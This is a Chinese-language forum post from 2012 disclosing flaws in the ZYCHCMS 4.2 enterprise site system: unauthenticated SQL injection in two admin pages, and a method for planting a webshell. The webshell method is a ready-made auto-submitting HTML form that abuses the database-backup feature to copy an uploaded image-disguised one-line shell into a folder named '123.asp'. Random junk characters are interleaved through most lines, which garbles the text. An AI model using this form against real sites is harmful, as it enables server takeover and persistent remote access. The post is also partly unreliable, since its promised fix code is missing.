' D0 X( Z8 C6 V) l: f1 I3 \$ A y0 E1 U
5 X }# e/ ^, P
3 l/ \9 f" I) s0 R* l影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)2 ?/ U- M. m. T1 D& Z' Z- W4 W
①SQL注射漏洞' `2 n& o" h n
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp8 f4 F: W# N5 h5 M
漏洞原因:未过滤
% u+ e: A- r& R( a$ { ~6 a( T; y 漏洞代码:2 @& Y4 r! m) ~6 M4 e7 M- S
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。' s [8 {/ [# r* S1 P4 z, }+ j
修复方法:在文件开头加入代码( J, E% g" N8 e% `
* T+ R- Y: ~1 S% z2 d3 Y9 m
7 L# x6 `, O. V2 r5 R
②后台拿WBSHELL. x3 j* H5 m9 X, ~8 q
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。0 v5 I+ u$ c6 i' I# `
这里在网上找了一个,改了下,将就着用。
* ?4 U4 T: i& Y! I* G 以下是代码本地提交代码
2 a* @" A. H0 X7 d( Z$ l / g$ Q0 B% _" H5 e
4 S2 b f! v5 ?/ w3 ?0 {% I<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
3 Z* e: v1 P# S2 ?* c! x <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
5 Q9 p- @/ D, w+ q. _ <tr>
) a) O& Q( l7 P* B <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
0 t& X- x) ^; [" P+ F5 |5 I </tr>
: x5 [! c/ h4 Q. B# j. m1 ?0 L* h @ <tr>! `, }( K5 I6 \5 F
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>. N7 i2 w9 B0 S( D/ A( Q
</span>
3 r) S% a# m2 ]' s1 H& N <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
7 c5 s/ j f8 v! v k <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
3 A2 [" V: ~* k6 f. L <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
; `* }# @: N* G8 {+ @! P) \ <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
" }( Z7 L2 ?8 G. Z <div align=”left”>
M {5 q0 E$ b* ]; Q3 f, |7 h: F! ^ <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
! J2 q, Y7 I) F) T$ }% t& S0 ? <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>; C& ^$ O' u1 Z) S" M. T" S
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />1 w: n3 ?. }0 n! F- n; W, y4 U
</div></td>9 M1 ~ S; R' s; d/ n3 \* h
</tr>( k7 O" m2 m+ Z* v% L+ c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
: |. t# F) @9 @' ~: b6 l. M2 u <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
3 p2 v" C" i$ g* v8 k <td class=”td”><div align=”left”>( Y8 U1 B6 x% \
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />2 ?. W7 N7 O: J3 ~ |( }7 d G
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
. U$ h" l" D8 S$ [1 w& \( o _& w </tr>
7 C1 e: }8 i/ N <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
6 c6 C$ }% K& ~ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
$ _6 q6 n% ~6 |' @ <td class=”td”><div align=”left”>: z0 K( ~7 H$ c" [" Y
<input type=”submit” value=”确定备份” class=”btn”" V" @' D. ^+ v6 c+ O% D0 m
</div></td>" L) r* _) p- |* Q+ D3 p" \- G& C. ]5 I
</tr>/ v7 Y' q. M5 \% f* v- _1 n
</table></td></tr></form>& `4 D* M7 P+ O) V
</table>7 E$ v/ I" e: g9 j* k
</td>7 V# _ k1 u9 D
</tr>
6 @5 I9 q: d8 b8 ?* y4 Q: U </table>8 _& @. @. V: o% K1 y
<script>
$ F" s. G! I% R+ p$ `/ X document.all.add.submit();
1 u1 S7 v: p$ _( }8 \" m4 L </script>3 H' x8 `/ U* X
& g- x' i7 n& n7 ?5 ]8 J
, R! r+ J% p. J- s) O. a1 t v6 A$ d2 v2 x0 p
2 H" m' M5 q2 A, V
]$ H8 r8 ]* p2 }: |7 ]; N, Z& _4 I
& Y# j/ ~4 j3 T+ v$ n. x/ O( Q. `
* R; Z& a& m% `1 @5 \6 v/ L p$ d& a8 g" S
! J- z7 ~* A% t/ M
|
发表于 2012-9-10 21:09:51
收藏
支持
反对